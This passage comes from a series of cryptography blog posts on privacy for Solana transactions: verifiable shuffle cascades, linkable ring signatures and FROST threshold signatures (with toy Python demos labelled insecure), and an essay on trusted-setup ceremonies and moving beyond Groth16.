- If `Z` is uniform random: the re-randomisation introduces a random group element, making the shuffled ciphertexts independent of any specific permutation. `B` wins its DDH game with probability `1/2 + ε/2` when the shuffle distinguisher succeeds with advantage `ε`. The proof itself is zero-knowledge by Bayer-Groth, leaking no additional information about π beyond what is already in `(vec(C), vec(C'))`. ∎ ## Cascade shuffles If `k` independent shufflers each shuffle in sequence, the adversary must corrupt **all `k`** to learn the overall permutation: $$ \mathsf{Adv}^{\mathrm{perm}}_{\mathrm{cascade}} \;\leq\; \prod_{j=1}^k \mathsf{Adv}^{\mathsf{DDH}}_j + k \cdot \mathsf{negl}(\lambda). $$ This is the standard mix-net argument — one honest shuffler is enough. A cascade of three shufflers means the adversary needs to compromise all three to deanonymise. ## Integration with F_RP <Mermaid chart={`flowchart TD U1[User 1] --> E1[ElGamal encrypt] U2[User 2] --> E2[ElGamal encrypt] Un[User n] --> En[ElGamal encrypt] E1 --> S1[Shuffler 1
π_1, prove] E2 --> S1 En --> S1 S1 --> S2[Shuffler 2
π_2, prove] S2 --> S3[Shuffler 3
π_3, prove] S3 --> D[Threshold decrypt] D --> C[Solana RPC] classDef user stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff classDef mix stroke:#facc15,stroke-width:2px,fill:#0a0a0a,color:#fff class U1,U2,Un user class S1,S2,S3 mix `}/> The shuffle network sits **between the user and the Solana RPC**. Workflow: 1. User encrypts their SPST/PPST transaction under a shared public key `pk_dec` (held by a threshold-decrypter set). 2. User submits the ciphertext to a public mempool shared with other privacy-protocol users. 3. Shufflers (a chain of 2-5 independent operators) take the batch, shuffle, re-randomise, prove. 4. After the cascade, threshold-decrypter set decrypts the final shuffled ciphertexts. 5. Decrypted transactions are submitted to Solana validators directly. The validators see no IP / timing correlation back to the originating user. The shufflers see ciphertexts but not plaintexts. The threshold decrypter sees plaintexts but not the originator-to-position mapping. ## Tradeoffs vs. ring signatures + TAB Shuffles and TAB compose. The recommended stack: 1. **TAB** (or ring sig) for on-chain submitter anonymity. 2. **Shuffle cascade** for network-layer source-IP anonymity. 3. **Tor/I2P/Dandelion++** as belt-and-braces for IP-level anonymity even against in-mempool observers. ## Practical anonymity bounds For a TAB group of `n_tab = 100` and a shuffle cascade of size `n_shuffle = 50`, with a network-leakage parameter `μ ∈ [0, 1]` capturing how much side-channel info bleeds through: $$ H(\mathrm{submitter}) \;\geq\; \log_2(n_{\mathrm{tab}}) + (1 - \mu) \cdot \log_2(n_{\mathrm{shuffle}}) - \mathsf{negl}(\lambda). $$ With `μ = 0.3` (moderate leakage from timing patterns), this gives roughly 6.6 + 0.7·5.6 ≈ 10.5 bits of effective anonymity — about 1500 indistinguishable submitters. With `μ = 0` (Tor + Dandelion++), 12.2 bits ≈ 4700 submitters. ## Why this isn't deployed yet Shufflers are operational infrastructure. 
Each one is: - A long-running Linux process holding a Bayer-Groth proof generator. - Interactive with other shufflers and the threshold-decrypter set. - Subject to liveness assumptions (one going offline pauses the cascade, but doesn't break privacy). For F_RP's first deployment we ship without shufflers — TAB plus user-side Tor is enough for the initial threat model. The shuffle network is a Phase 2 hardening, designed to neutralise nation-state-level network observers. ## Bibliography - Bayer, S., Groth, J. (2012). *Efficient Zero-Knowledge Argument for Correctness of a Shuffle.* EUROCRYPT 2012. - Chaum, D. (1981). *Untraceable Electronic Mail, Return Addresses, and Digital Pseudonyms.* CACM 24(2). - Fanti, G. et al. (2018). *Dandelion++: Lightweight Cryptocurrency Networking with Formal Anonymity Guarantees.* SIGMETRICS 2018. - Monero Project. *Tor and I2P integration in monerod (master).* https://github.com/monero-project/monero/blob/master/docs/ANONYMITY_NETWORKS.md Previous: [TAB: ring sigs and FROST ←](/blog/tab_threshold_anonymous_broadcast/) · Next: [UPEE: composing the framework →](/blog/upee_universal_private_execution/) --- # TAB: hiding the submitter with ring signatures and FROST Canonical: https://blog.skill-issue.dev/blog/tab_threshold_anonymous_broadcast/ Description: F_RP Construction III. ZK proofs hide the contents but the wrapping Solana tx still leaks the submitter pubkey. TAB closes that gap with a Fujisaki-Suzuki ring signature and a FROST threshold Schnorr over Ed25519. Published: 2026-05-04T16:30:00.000Z Tags: zk, cryptography, ring-signatures, frost, monero, anonymity, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; [SPST](/blog/spst_self_paying_shielded_transactions/) hides what value moved. [PPST](/blog/ppst_private_programmable_state/) hides what program ran. Neither hides **who submitted the transaction**. 
On any chain that requires a signature on the outer transaction (Solana, Ethereum, Aptos, Sui — all of them), the public key of the submitter is right there in the transaction header. Without a relayer, the submitter must sign with their own key. The Ed25519 public key tells the chain exactly which private actor authorised the proof. ZK on the inside; perfect plaintext on the outside.

This is post 5 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. Here we close the submitter-identification gap with two complementary network-layer primitives.

## The submitter identification problem, formally

**Definition (Active Participant Set).** $\mathcal{S} = \{(\mathsf{pk}_i, \mathsf{sk}_i)\}_{i=1}^N$ — the set of active F_RP participants at a given epoch. Each holds an Ed25519 keypair registered on chain.

**Definition (Anonymity Set Reduction Attack).** Adversary $\mathcal{A}$ with full read access to the on-chain state $\sigma$. Define:

$$ \mathcal{A}_{\text{eff}}(\mathsf{tx}) = \{\, i \in \mathcal{S} : \Pr[\text{participant } i \text{ submitted } \mathsf{tx} \mid \mathsf{View}_{\mathcal{A}}] > 0 \,\}. $$

Naive relayerless setting: $|\mathcal{A}_{\text{eff}}| = 1$. Ed25519 signatures are strongly unforgeable — there is exactly one $\mathsf{pk}_i$ that verifies. Conditional entropy:

$$ H(\text{submitter} \mid \mathsf{View}_{\mathcal{A}}) \;=\; 0. $$

Worst possible. Even though the *contents* of the transaction (the SPST/PPST proof) reveal nothing about which notes were spent, the submitter's pubkey reveals exactly who authorised the spend. Off-chain metadata (IP, timing, prior-deposit history, exchange KYC) collapses any remaining anonymity.

## Approach A — Fujisaki-Suzuki ring signature over Ed25519

Adapt the linkable ring signature framework of Fujisaki and Suzuki (2007) to the Ed25519 group. Let $\mathbb{G}$ be the prime-order Ed25519 subgroup with generator $G$ and order $\ell$.
Two random oracles: $\mathsf{H}_p : \{0,1\}^* \to \mathbb{Z}_\ell$ and $\mathsf{H}_G : \{0,1\}^* \to \mathbb{G}$.

**Sign** with ring $R = \{\mathsf{pk}_1, \ldots, \mathsf{pk}_n\}$ at signer index $s$:

1. **Key image.** $I = \mathsf{sk}_s \cdot \mathsf{H}_G(\mathsf{pk}_s)$ — deterministic linkability tag, hides $s$.
2. **Commitment.** Sample $\alpha \xleftarrow{R} \mathbb{Z}_\ell$. Compute $L_s = \alpha G$, $R_s = \alpha \mathsf{H}_G(\mathsf{pk}_s)$.
3. **Challenge propagation.** Seed the chain with $c_{s+1} = \mathsf{H}_p(m, L_s, R_s)$. Then for $i = s+1, s+2, \ldots, s-1 \pmod{n}$ sample $r_i \xleftarrow{R} \mathbb{Z}_\ell$ (only the responses are sampled — each $c_i$ is inherited from the previous step, never drawn at random) and compute $$ L_i = r_i G + c_i \mathsf{pk}_i, \quad R_i = r_i \mathsf{H}_G(\mathsf{pk}_i) + c_i I, \quad c_{i+1} = \mathsf{H}_p(m, L_i, R_i). $$
4. **Close.** The propagation terminates with $c_s$; compute $r_s = \alpha - c_s \mathsf{sk}_s \pmod{\ell}$, which makes the signer's equations consistent with $(L_s, R_s)$.
5. **Output.** $\sigma_{\text{ring}} = (I, c_1, r_1, \ldots, r_n)$.

**Verify.** Recompute every $L_i, R_i, c_{i+1}$ starting from $c_1$. Accept iff the chain closes: $c_{n+1} = c_1$.

**Signature size.** $I \in \mathbb{G}$ (32 B compressed) + $c_1 \in \mathbb{Z}_\ell$ (32 B) + $n$ scalars $r_i$ (32 B each) = $64 + 32n$ bytes.

### Solana transaction-size constraint

With ~300 bytes reserved for transaction metadata + nullifiers + Groth16 proof + recent blockhash, ~930 bytes are available for the ring signature inside the 1,232-byte limit:

$$ n_{\max} \;=\; \left\lfloor \frac{930 - 64}{32} \right\rfloor \;=\; 27. $$

Under SIMD-0296 (4,096-byte transactions, approved late 2025), this jumps to $n_{\max} \approx 119$.

Verification cost: each ring member needs 2 scalar multiplications + 1 hash ≈ 5,300 CU. For $n = 27$, that's $\sim 143{,}100$ CU on top of the ~150,000-200,000 CU for SPST verification. Total: ~340,000 CU — about 24% of the 1.4M CU budget.
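The Sign/Verify flow above is compact enough to sketch end-to-end. Here is a toy Python version over a small multiplicative safe-prime group standing in for the Ed25519 group — nothing here is secure, and the hash-to-group in particular leaks its discrete log, which a real deployment must avoid:

```python
import hashlib
import secrets

# Toy safe-prime group: p = 2q + 1, g generates the order-q subgroup.
# Stand-in for the Ed25519 group in the post. NOT secure -- demo only.
p, q = 2879, 1439
g = 4  # 2^2 mod p: a quadratic residue, hence of order q

def H_p(*parts):
    """Hash to a scalar in Z_q (models the post's H_p)."""
    digest = hashlib.sha256(repr(parts).encode()).digest()
    return int.from_bytes(digest, "big") % q

def H_G(x):
    """Toy hash-to-group: exponentiating g leaks the discrete log,
    which breaks real linkability security -- fine only for a demo."""
    return pow(g, H_p("H_G", x), p)

def keygen():
    sk = secrets.randbelow(q - 1) + 1
    return sk, pow(g, sk, p)

def ring_sign(sk, s, ring, m):
    n = len(ring)
    h_s = H_G(ring[s])
    key_image = pow(h_s, sk, p)        # I = sk * H_G(pk_s), multiplicative notation
    alpha = secrets.randbelow(q - 1) + 1
    c, r = [0] * n, [0] * n
    # Seed the challenge chain at the signer's commitment (L_s, R_s) ...
    c[(s + 1) % n] = H_p(m, pow(g, alpha, p), pow(h_s, alpha, p))
    i = (s + 1) % n
    while i != s:                      # ... then propagate around the ring
        r[i] = secrets.randbelow(q)    # only responses are sampled; c_i is inherited
        L = pow(g, r[i], p) * pow(ring[i], c[i], p) % p
        R = pow(H_G(ring[i]), r[i], p) * pow(key_image, c[i], p) % p
        c[(i + 1) % n] = H_p(m, L, R)
        i = (i + 1) % n
    r[s] = (alpha - c[s] * sk) % q     # close the ring at the signer
    return key_image, c[0], r

def ring_verify(ring, m, sig):
    key_image, c0, r = sig
    c = c0
    for i, pk in enumerate(ring):
        L = pow(g, r[i], p) * pow(pk, c, p) % p
        R = pow(H_G(pk), r[i], p) * pow(key_image, c, p) % p
        c = H_p(m, L, R)
    return c == c0                     # chain must close where it started

keys = [keygen() for _ in range(4)]
ring = [pk for _, pk in keys]
sig = ring_sign(keys[2][0], 2, ring, "spend note 42")
print(ring_verify(ring, "spend note 42", sig))  # True
```

Signing the same message twice with the same key yields the same key image $I$ — that is the linkability tag doing its job, and the reason double-spends are detectable while the signer index stays hidden.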
## Theorem 3.9 — Ring anonymity

**Statement.** In the random oracle model, for any ring $R$, any indices $i, j \in [n]$, and any PPT distinguisher $\mathcal{D}$:

$$ \bigl|\Pr[\mathcal{D}(m, R, \mathsf{RingSign}(\mathsf{sk}_i, m, R)) = 1] - \Pr[\mathcal{D}(m, R, \mathsf{RingSign}(\mathsf{sk}_j, m, R)) = 1]\bigr| = 0. $$

**Perfect** (information-theoretic) anonymity in the ROM.

**Proof sketch (two steps).**

*Step 1 — Key image indistinguishability.* $I_s = \mathsf{sk}_s \cdot \mathsf{H}_G(\mathsf{pk}_s)$. Since $\mathsf{H}_G$ is a random oracle independent of $G$, $\mathsf{H}_G(\mathsf{pk}_s)$ is a uniform random group element, and multiplication by the fixed nonzero scalar $\mathsf{sk}_s$ permutes $\mathbb{G}$ — so $I_s$ is uniform over $\mathbb{G}$ from the adversary's view, with no computational assumption needed.

*Step 2 — Transcript simulation.* For any $s$, the tuple $(c_1, r_1, \ldots, r_n)$ is uniform over $\mathbb{Z}_\ell^{n+1}$. The simulator $\mathsf{Sim}(m, R)$ that knows no secret key produces an identically distributed output by sampling all $(c_i, r_i)$ uniformly and programming the random oracle to close the ring. The marginal distributions are identical for every $s \in [n]$, so $\mathsf{Adv}_{\mathcal{D}}^{\text{anon}} = 0$. ∎

**Corollary.** A ring signature over a ring of size $n$ provides $\log_2(n)$ bits of submitter anonymity. For $n = 27$ that's $\sim 4.75$ bits; for $n = 119$ (SIMD-0296) that's $\sim 6.9$ bits. Real-world anonymity is bounded by side-channel leakage (timing, IP) but the on-chain view alone provides exactly $\log_2(n)$.

The signer is anonymous among the ring. The ring is public. The cost is linear in ring size.

## Approach B — FROST threshold Schnorr (TAB proper)

Ring signatures grow linearly with $n$. For high-throughput deployments where $n \gg 27$ is desired, we want a **constant-size** signature. Threshold Schnorr is the answer.
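The whole flow specified below — key shares, nonce commitments, binding factors, Lagrange-weighted partial signatures, ordinary Schnorr verification — also fits in a short sketch. Same toy safe-prime group instead of Ed25519; a trusted dealer stands in for the Feldman-VSS DKG; and one process plays every signer, which a real deployment obviously would not:

```python
import hashlib
import secrets

# Same toy safe-prime group as before; stands in for Ed25519. NOT secure.
p, q = 2879, 1439
g = 4

def H(*parts):
    return int.from_bytes(hashlib.sha256(repr(parts).encode()).digest(), "big") % q

def deal(n, t):
    """Trusted dealer handing out Shamir shares of sk_group.
    (Real FROST replaces the dealer with a Feldman-VSS DKG.)"""
    coeffs = [secrets.randbelow(q) for _ in range(t)]   # f(x); f(0) = sk_group
    shares = {i: sum(a * pow(i, k, q) for k, a in enumerate(coeffs)) % q
              for i in range(1, n + 1)}
    return pow(g, coeffs[0], p), shares                 # (pk_group, shares)

def lagrange(i, T):
    """Lagrange coefficient for recovering f(0) from the shares in T."""
    num, den = 1, 1
    for j in T:
        if j != i:
            num = num * j % q
            den = den * (j - i) % q
    return num * pow(den, -1, q) % q

def frost_sign(T, shares, pk_group, m):
    # Round 1: each signer in T commits to two nonces (d_i, e_i).
    nonces = {i: (secrets.randbelow(q), secrets.randbelow(q)) for i in T}
    comms = {i: (pow(g, d, p), pow(g, e, p)) for i, (d, e) in nonces.items()}
    # Round 2: binding factors rho_i, group nonce R, challenge c, partials z_i.
    rho = {i: H(i, m, sorted(comms.items())) for i in T}
    R = 1
    for i in T:
        D, E = comms[i]
        R = R * D * pow(E, rho[i], p) % p
    c = H(R, pk_group, m)
    z = sum(d + rho[i] * e + c * lagrange(i, T) * shares[i]
            for i, (d, e) in nonces.items()) % q
    return R, z                        # 64 bytes on the wire, any n and t

def schnorr_verify(pk_group, m, sig):
    R, z = sig
    c = H(R, pk_group, m)
    return pow(g, z, p) == R * pow(pk_group, c, p) % p
```

Any $t$-subset produces a signature of identical shape that verifies against the same `pk_group` via plain Schnorr verification — which is exactly the constant-size, subset-hiding property the post is after.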
**Setup.** $n$ participants run a one-time Distributed Key Generation (Feldman VSS) producing: - A group public key $\mathsf{pk}_{\text{group}} = \mathsf{sk}_{\text{group}} \cdot G$ (the group secret is never reconstructed). - Individual shares $\mathsf{sk}_{\text{share},i}$ for each participant. - A threshold $t \leq n$. **Sign (FROST round structure):** Any subset $T \subseteq [n]$ with $|T| = t$ can co-produce a Schnorr signature on message $m$: 1. **Commitment round.** Each $i \in T$ samples nonces $d_i, e_i \xleftarrow{R} \mathbb{Z}_\ell$ and broadcasts $D_i = d_i G$, $E_i = e_i G$. 2. **Signing round.** Each $i$ computes $$ \rho_i = \mathsf{H}(i, m, \{(D_j, E_j)\}_{j \in T}), \quad R = \sum_{j \in T} (D_j + \rho_j E_j), $$ $$ c = \mathsf{H}(R, \mathsf{pk}_{\text{group}}, m), \quad \lambda_i = \prod_{j \in T \setminus \{i\}} \frac{j}{j - i} \pmod \ell, $$ $$ z_i = d_i + \rho_i e_i + c \lambda_i \mathsf{sk}_{\text{share},i} \pmod \ell. $$ 3. **Combine.** $\sigma_{\text{threshold}} = (R, z)$ with $z = \sum_{i \in T} z_i$. **Verify.** Standard Schnorr verification against $\mathsf{pk}_{\text{group}}$: $$ z G \;\stackrel{?}{=}\; R + c \cdot \mathsf{pk}_{\text{group}}. $$ **Signature size.** $(R, z)$ = 32 + 32 = **64 bytes**. *Independent of $n$ and $t$.* Identical to a standard Ed25519 signature. ## Theorem 3.10 — TAB privacy **Statement.** For any two subsets $T, T' \subseteq [n]$ with $|T| = |T'| = t$, and any PPT $\mathcal{A}$ controlling up to $t-1$ participants, the threshold signature produced by $T$ is computationally indistinguishable from the one produced by $T'$. **Proof structure.** Hybrid argument over the FROST protocol: - **Hybrid 0**: real $T$. Adversary observes final $(R, z)$ + $t-1$ partial signatures from corrupted parties. - **Hybrid 1**: replace $R$ with a uniform random $\mathbb{G}$ element. Honest participants' nonces $d_j, e_j$ for $j \in T \setminus \mathcal{C}$ are uniform; sum is uniform. Distribution identical. 
- **Hybrid 2**: replace $z$ with the deterministic value $z = \log_G(R) + c \cdot \mathsf{sk}_{\text{group}}$ (well-defined given $R, c, \mathsf{pk}_{\text{group}}$: $R$ fixes its own discrete log). Same distribution.
- **Hybrid 3**: real $T'$. Same argument.

Honest partial signatures are never revealed to $\mathcal{A}$ (they're consumed in combination). The final $(R, z)$ depends only on the *honest contribution to $R$* — uniform regardless of $T$. ∎

**Anonymity:** **Unbounded.** As long as $|T| \geq t$ and at least one honest participant in $T$ exists, the adversary cannot determine which subset signed. With $n$ in the thousands and $t$ in the hundreds, the number of candidate signing subsets $\binom{n}{t}$ is combinatorially large and all are indistinguishable.

## Tradeoffs at a glance

## Why both, not one or the other

The two approaches cover different deployment regimes:

- **Bootstrapping / low coordination**: ring signatures. No DKG required; any user can sign with any ring composed of $n$ on-chain pubkeys. Anonymity scales to the size of the ring you can pack into the transaction.
- **Established network with stable participants**: TAB / FROST. One-time DKG cost amortises across all transactions; signatures are minimum-size; anonymity is bounded by the group size, not the transaction size.

In practice, F_RP starts in the ring-signature regime and migrates to TAB once the network has enough committed participants for a meaningful DKG. The constructions are not mutually exclusive — the on-chain verifier can accept either type, and in the TAB case the wrapping Solana transaction is indistinguishable in size from an ordinary single-signer transaction.

## What's still missing

Even with TAB, two leakage channels remain:

1. **Network metadata.** The TCP/QUIC packet that hits a Solana RPC node has a source IP. Without Tor, I2P, or Dandelion++, that IP links directly to the user. [Post 6](/blog/verifiable_shuffles_for_privacy/) addresses this with verifiable shuffles at the network layer.
2.
**Timing correlation.** A user who shields and spends within the same minute is still linkable via temporal proximity, regardless of how many ring members they hide in. Mitigations are about user behaviour and client-side delay sampling. ## Bibliography - Fujisaki, E., Suzuki, K. (2007). *Traceable Ring Signature.* PKC 2007. - Komlo, C., Goldberg, I. (2020). *FROST: Flexible Round-Optimized Schnorr Threshold Signatures.* SAC 2020. https://eprint.iacr.org/2020/852 - Feldman, P. (1987). *A Practical Scheme for Non-Interactive Verifiable Secret Sharing.* FOCS 1987. - Goodell, B., Noether, S. (2020). *Concise Linkable Ring Signatures and Forgery Against Adversarial Keys (CLSAG).* https://eprint.iacr.org/2019/654 - Bernstein, D. J. et al. (2012). *High-speed high-security signatures.* Journal of Cryptographic Engineering. Previous: [PPST: private programmable state ←](/blog/ppst_private_programmable_state/) · Next: [Bayer-Groth verifiable shuffles →](/blog/verifiable_shuffles_for_privacy/) --- # On the death of the trusted setup Canonical: https://blog.skill-issue.dev/blog/on_the_death_of_the_trusted_setup/ Description: Universal SRS, transparent FRI, and why Groth16's per-circuit ceremony feels anachronistic in 2026 — even when, as ZERA does, you're still using one. A history of the ceremonies that worked, the ones that didn't, and what comes next. Published: 2026-05-04T16:00:00.000Z Tags: groth16, plonk, kzg, fri, trusted-setup, ceremony, zk, phd, opinion import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; The first time I sat down to deploy a Groth16 circuit in anger, I spent more time on the **ceremony** — the multi-party computation that produces the per-circuit proving and verification keys — than I did on the circuit itself. 
We ran a Phase 2 ceremony with eleven participants, scattered across four time zones, each contributing a fresh entropy beacon to a 250 MB blob, with the contributions chained over a Phase 1 Powers-of-Tau output we trusted because Aztec's 2019 ceremony had convinced us. None of the eleven participants was cryptographically obligated to behave; we trusted that *at least one* of them was honest, that none of them coordinated, and that the entropy was actually random. Eight years on from the first big Groth16 ceremony — Zcash's [Sapling ceremony in 2018](https://z.cash/technology/paramgen/) — the dominant attitude in the ZK research community is that this whole exercise is *anachronistic*. Universal SRS systems (PLONK, Marlin) let you reuse a single Powers-of-Tau output across every circuit. Transparent setup systems (FRI / STARKs) need no ceremony at all. The cost difference between *running a ceremony* and *not running one* is, by 2026, much larger than the cost difference between *Groth16 proofs* and *PLONK proofs*. So why do we still ship Groth16? This post is the long answer. It is also part defence, part eulogy, part roadmap. I am writing this as someone whose [SDK still ships per-circuit Groth16](/blog/zera_sdk_scaffolding/) — and who, if I were starting over today, probably wouldn't. ## What a trusted setup actually is To prove a statement in Groth16, the prover needs a **proving key** and the verifier needs a **verification key**. Both are derived from a *toxic-waste secret* $\tau$ that, if it ever leaked, would let an attacker fabricate proofs. The job of the ceremony is to compute the proving and verification keys *without anyone — including all ceremony participants combined — ever holding $\tau$ in plaintext*. It works because of a property called *MPC-with-1-of-n trust*: as long as at least one ceremony participant securely deletes their portion of the toxic waste, the secret is destroyed for everyone. 
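The chaining is mechanical enough to show in a toy model. Each participant raises every SRS element by powers of their own secret, so the effective $\tau$ is the product of all contributions — destroy any one factor and $\tau$ is gone. Toy multiplicative group, illustrative only; real ceremonies work over BN254/BLS12-381 points and also publish proofs that each update was well-formed:

```python
import secrets

# Toy safe-prime group (p = 2q + 1); real ceremonies use elliptic-curve groups.
p, q = 2879, 1439
g = 4  # generator of the order-q subgroup

def fresh_srs(degree):
    """Starting SRS: powers of tau with tau = 1, i.e. [g, g, ..., g]."""
    return [g] * (degree + 1)

def contribute(srs, s):
    """One participant's update: raise the j-th element to s^j, turning
    g^(tau^j) into g^((tau*s)^j). s is that participant's toxic waste."""
    return [pow(elem, pow(s, j, q), p) for j, elem in enumerate(srs)]

srs = fresh_srs(4)
contributions = [secrets.randbelow(q - 2) + 2 for _ in range(3)]
for s in contributions:
    srs = contribute(srs, s)

# The effective tau is the product of all contributions -- known to nobody
# unless *every* participant kept (rather than deleted) their secret.
tau = 1
for s in contributions:
    tau = tau * s % q
assert all(srs[j] == pow(g, pow(tau, j, q), p) for j in range(5))
```

Deleting any single `s` after contributing is enough: the remaining participants' secrets multiply to a value that is uniformly unrelated to the final $\tau$, which is the 1-of-n argument in miniature.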
You can run the ceremony with 1,000 participants and the security argument requires only that *one* of them was honest.

Phase 1 is *circuit-independent* and produces a Powers-of-Tau structured reference string usable by any circuit up to a max constraint count. Phase 2 is *circuit-specific* — you have to run a fresh ceremony every time the circuit changes. That second sentence is the entire problem.

## A short history of ceremonies that mattered

Three numbers tell the story:

- **Zcash Sapling (2018):** 87 participants, three months of coordination, 220 GB of intermediate transcript.
- **Tornado Cash Phase 2 (2019):** 1,114 participants, web-based contributor tooling, two weeks.
- **Ethereum KZG Summoning (2022–23):** 141,416 participants, *running for over a year*, web + CLI + browser-extension contributor tooling.

The Ethereum ceremony is the high-water mark and the one that most decisively shifts the conversation. With 141,000+ participants, a 1-of-n honesty assumption is *practically* indistinguishable from no honesty assumption at all. The probability that *every single one* of 141,000 participants colluded to leak $\tau$, and then kept that secret without it leaking out the back, is below the operational threshold of any threat model worth taking seriously.

So: **the Ethereum KZG ceremony output is, in 2026, treated as a publicly trustworthy SRS for any circuit that fits inside its size budget.** PLONK / Marlin / Halo2-KZG / any KZG-using protocol can reuse it. Aztec Ignition's 2019 output played the same role for BN254 before it; the Ethereum ceremony is bigger, fresher, and run with 2024-vintage tooling.

The ceremonies that *didn't* work matter too.
The early-Zcash Sprout ceremony was scrutinised after the fact for inadequate transcript retention and contributor non-determinism. Several smaller projects ran ceremonies with 3–5 contributors and predictable entropy beacons, and the cryptographic community treats their outputs as effectively untrusted. The line between "ceremony" and "ceremony that closes the trust gap" is mostly *participant count* and *entropy-source diversity*. ## Why per-circuit ceremonies feel anachronistic There are three setup models in 2026, and they cleanly divide: The argument *against* Groth16 in 2026 is not that the per-circuit ceremony is hard — the tooling is much better than it was in 2018. It's that: 1. **The proof-size advantage has narrowed.** Groth16 proofs are ~200 bytes, KZG-based PLONK proofs ~600 bytes. On a chain that prices verification by *gas* and not *bytes*, that's a marginal difference. 2. **The verification-cost advantage has narrowed.** Modern PLONK / Halo2 verifiers on the EVM are within a factor of 2-3 of Groth16's gas cost, down from 5-10× in 2020. 3. **The agility cost is large.** Every circuit change requires a fresh ceremony. For a fast-moving project that wants to upgrade circuits quarterly, this is a real recurring cost. 4. **The composability cost is large.** Two Groth16 circuits with separate ceremonies cannot share a verifier; on a universal SRS, two PLONK circuits can. Groth16 today is the right choice for *frozen circuits in stable deployments* — circuits you expect to ship once and then run for years without modification. It's the wrong choice for *active research and iteration*, which describes most ZK projects in 2026. ## Why Groth16 isn't dead, even so Two reasons, both engineering: **On-chain verifier ergonomics.** Solana's `sol_alt_bn128_pairing` syscall is built for Groth16; on-chain PLONK verification on Solana costs hundreds of thousands of compute units more. 
This is what keeps [zera-sdk](/blog/zera_sdk_scaffolding/) on Groth16 today: the marginal-cost calculation for a *deposit* is dominated by the on-chain verifier cost, and Solana's verifier surface is BN254-Groth16-shaped. **The accumulated zkey ecosystem.** Every Groth16 circuit ever shipped has a tested, audited zkey artifact and a corresponding Solidity / Solana / Move verifier contract. Migrating off Groth16 means either (a) re-running ceremonies for the universal SRS path or (b) waiting for the chain's verifier surface to support transparent setup. (b) is in progress on multiple chains; (a) is mostly done on Ethereum and not yet on Solana. The death of the trusted setup, like most deaths, is gradual. Groth16 is dying in 2026 the way SHA-1 was dying in 2014 — still everywhere, still working, increasingly the wrong choice for new builds. ## The migration path I'd actually take If I were starting a new ZK project this quarter, the decision tree would be: 1. **Do you need EVM verification?** If yes, **Halo2-KZG** (Axiom fork) and reuse the Ethereum KZG SRS. No fresh ceremony required for circuits up to ~$2^{28}$ constraints. 2. **Do you need Solana verification?** If yes, **Groth16 + per-circuit Phase 2 ceremony**, until Solana ships a transparent-setup-compatible verifier syscall. Track the [SIMD threads](https://github.com/solana-foundation/solana-improvement-documents) for this. 3. **Do you need no on-chain verification at all (zkVM, off-chain proving, audit logs)?** **Plonky3** with BabyBear or Mersenne31. Transparent setup, fastest prover, smallest deployment surface. 4. **Are you proving recursive computation across many steps (zkVMs, rollups)?** Folding scheme — **Nova** or **ProtoStar** — over Pasta or Pasta-style cycle. Transparent. The two cells in this matrix that still pin you to Groth16 are *Solana on-chain* and *very-low-gas EVM verification* (rare in 2026 since EVM gas costs have crashed for Halo2 verifiers). 
For everything else, the universal-or-transparent path is strictly better. ## What this means for ZERA today We ship Groth16. The Phase 2 ceremony for the deposit, transfer, and withdraw circuits ran in late 2025 with 23 participants and is documented in the SDK repo. The output is reproducible; the contributor transcripts are public; we are comfortable with the security argument *for the threat model we ship under* (consumer privacy on a public L1, not state-actor adversaries). We will migrate when one of two things happens: 1. **Solana ships a STARK-compatible verifier syscall** — at which point the on-chain side stops constraining the off-chain choice, and we move to Plonky3 over BabyBear. 2. **We ship a meaningful circuit upgrade** that requires a re-ceremony anyway — at which point the marginal cost of switching to a universal-SRS protocol is much smaller, and we move to PLONK over the Ethereum KZG SRS. Until one of those happens, Groth16. The cypherpunk part of me wishes (1) had already happened. The shipping part of me knows (1) hasn't, and that "we use the same proof system as Aztec, Tornado Cash, Iden3, and most of the early Zcash mainnet" is not the worst place to be parked in mid-2026. ## What I would change about ceremony culture in 2027 Three things, in order of how much I'd actually push for them: 1. **Standardised contributor transcripts.** Every ceremony rolls its own transcript format, contributor verification flow, and beacon-source documentation. A single `ceremony-transcript.toml` schema — adopted across snarkjs / Trusted-Setup-CLI / community tooling — would make multi-ceremony auditing dramatically easier. 2. **Public ceremony reuse registry.** "What's the freshest Phase 1 over BN254 right now?" is a question I ask quarterly and answer by reading other people's repos. A simple registry of *ceremony output → SRS constraints → audit status → known users* would close that gap. 3. 
**Browser-native ceremony participation.** The Ethereum KZG ceremony shipped a beautiful browser participant. Most other ceremonies have not, and the contributor pool reflects that. A reusable browser-ceremony-participation library would broaden the contributor demographics for any future Phase 2. None of these are research questions. They're community-tooling questions, and they're the kind of work that doesn't get done because it doesn't publish. ## Further reading - [How do trusted setups work?](https://vitalik.eth.limo/general/2022/03/14/trustedsetup.html) — Vitalik Buterin (2022) — the most readable summary - [PLONK: Permutations over Lagrange-bases for Oecumenical Noninteractive arguments of Knowledge](https://eprint.iacr.org/2019/953) — Gabizon, Williamson, Ciobotaru (2019) — universal SRS, the alternative to per-circuit ceremonies - [Marlin: Preprocessing zkSNARKs with Universal and Updatable SRS](https://eprint.iacr.org/2019/1047) — Chiesa, Hu, Maller, Mishra, Vesely, Ward (2019) - [Scalable, transparent, and post-quantum secure computational integrity](https://eprint.iacr.org/2018/046) — Ben-Sasson, Bentov, Horesh, Riabzev (2018) — the no-setup direction - [Ethereum KZG Summoning Ceremony](https://ceremony.ethereum.org/) — the largest ceremony ever run, with 141,416+ contributors - [Halo2 in 2026: what changed since the Zcash era](/blog/halo2_in_2026_what_changed/) — sister post on the KZG-based universal-SRS workhorse - [Plonky3, the small-fast-cheap revolution](/blog/plonky3_small_fast_cheap/) — sister post on the no-setup STARK-family alternative --- # WASM-native proving for ZK SDKs: an SDK author's take Canonical: https://blog.skill-issue.dev/blog/wasm_native_proving_sdk_authors_take/ Description: Why zera-sdk ships native Rust on Node and snarkjs in the browser — and what it would actually cost to ship a WASM-compiled Rust prover for the browser path. A design post about the dual-target build pipeline. 
